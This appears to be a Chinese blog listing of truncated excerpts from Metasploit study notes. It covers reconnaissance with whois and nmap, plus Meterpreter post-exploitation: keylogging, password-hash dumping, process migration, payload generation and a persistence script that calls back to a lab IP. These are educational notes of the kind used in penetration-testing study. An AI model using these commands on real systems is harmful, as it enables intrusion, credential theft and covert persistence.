metasploit 读书笔记-信息收集】的更多相关文章

三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集,包括使用工具Yeti、Whois (1)Whois msf > whois secmaniac.net (2)Netcraft:find the IP address of a server hosting a particular website (3)nslookup 2.主动信息收集:与目标系统主动交互 (1)使用nmap进行端口扫描 推荐选项-sS,执行一次隐秘的TCP扫描 推荐选项-Pn,告诉nmap不要使用ping命令判断…
信息收集 信息收集范围很大,可以从不同层面,不同维度进行信息收集. 系统补丁 我们知道目标机器缺少什么补丁就意味着存在与其对应的漏洞.我们可以利用这些漏洞来达到我们渗透攻击的目的. # 使用的模块 use post/windows/gether/enum_patches# 这个模块是基于session来指定的 不是通过rhosts Sql Server # Mssql 扫描端口 # mysql开了两个端口. 一个事TCP的 1433(动态端口), 一个是UDP 1434端口(用来查询TCP端口号…
一、基本命令 截屏 screenshot 2.获取系统平台信息 sysinfo 3.进程信息 ps 4.获取键盘记录 查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后-- run post/windows/capture/keylog_recorder 过一段时间CTRL+C中止。 最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。 5.提取密码哈希 use priv运行特权账号 run post/windows/gather/hashdump…
一、渗透攻击基础 1.常用命令 show exploits 显示Meta框架中所有可用的渗透攻击模块。 show options 显示模块所需要的各种参数 back 返回Meta的上一个状态 search 查找模块 use 使用模块 show payloads 输入此命令时,Meta只会将与当前模块兼容的攻击载荷显示出来; set payload 选择需要的payload show targets 列出受到漏洞影响目标系统的类型 注意:Auto Targeting 攻击模块通过目标系统的指纹信息…
The msfpayload component of Metasploit allows you to generate shellcode, executables, and much more for use in exploits outside of the Framework。msfpayload -h Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade…
Meterpreter的persisitence脚本允许主任meterpreter代理,以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间按绑定开放端口。 举例:run persistence -X -i 50 -p 442 -r 192.168.33.129 此脚本让系统开机自启动(-X),50秒(-i 50)重连一次,使用的端口是443(-p 443),连接的目的IP为192.168.33.129. use…
<玩转Django2.0>读书笔记-Django配置信息 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 项目配置是根据实际开发需求从而对整个Web框架编写相应配置信息.配置信息主要由项目对“setting”实现,主要配置有项目路径,密钥配置,域名访问权限,App列表,配置静态资源,配置模板文件,数据配置,中间件和缓存配置. 一.基本配置信息 一个简单对项目必须具备对基本配置信息有:项目路径,密钥配置,域名访问权限,App列表和中间件.以“MyWeb”项目为例,setting…
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器一台:192.168.163.132 WindowsXP机器一台:192.168.163.134 发现: Nmap使用:db_nmap 以前写过Nmap具体使用:https://www.cnblogs.com/xuyiqing/p/9686408.html 示例: Nmap在前面介绍过很多了,下面主要介绍Metasploit F…
好几天没发微信公众号了,今天一起发下.(最近有点事情) 前些天老业界的一位朋友问我一些Safe新时代信息收集的问题 逆天虽然好多年不干老本行,但隔段时间都会关注一下 于是就花了点时间整理了一下,你们就当看笑话看看吧 不知道的就长点见识,知道了就笑笑~~~~~~~~ 下周起继续更新专业知识~~ 请容忍我偶尔开个安全的小差~~~(*^__^*) ~~~ —————————————————————————————— ★Kali信息收集~ 0.Httrack 网站复制机 http://www.cnblo…
1.Shodan SHODAN搜索引擎不像百度谷歌等,它们爬取的是网页,而SHODAN搜索的是设备. 物联网使用过程中,通常容易出现安全问题,如果被黑客用SHODAN搜索到,后果不堪设想. 网站:https://www.shodan.io/ 如果不申请账号,只能搜索到10条信息,所以最好还是申请一个账号! 只需要一个邮箱验证即可,一分钟搞定. 使用搜索过滤 如果像前面单纯只使用关键字直接进行搜索,搜索结果可能不尽人意,那么此时我们就需要使用一些特定的命令对搜索结果进行过滤,常见用的过滤命令如下所…